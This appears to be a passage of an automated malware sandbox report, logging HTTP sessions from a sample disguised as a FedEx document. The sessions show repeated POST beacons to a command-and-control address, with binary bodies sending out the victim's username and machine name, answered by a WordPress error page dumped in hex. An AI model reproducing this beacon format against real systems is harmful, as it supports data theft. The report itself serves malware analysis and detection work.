                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:03.369915962 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:03.374491930 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:03.379290104 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                May 22, 2024 22:02:03.379306078 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                May 22, 2024 22:02:03.379316092 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                May 22, 2024 22:02:03.388897896 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:02:03.392338991 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:02:03.392354012 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:02:03.392359972 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.74971845.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:03.530500889 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:03.584224939 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:06.604466915 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:04 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:06.605866909 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:06.609208107 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:06.612574100 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:06.612612963 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:06.619216919 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:02:06.621898890 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:02:06.621936083 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                May 22, 2024 22:02:06.621967077 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:02:06.627296925 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.74971945.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:06.757642984 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:06.808172941 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:10.515069962 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:07 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:10.516139030 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:10.518595934 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:10.521087885 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:10.521102905 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:10.526042938 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:02:10.528512955 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:02:10.528528929 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                May 22, 2024 22:02:10.533463955 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                May 22, 2024 22:02:10.535226107 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.74972045.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:10.745955944 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
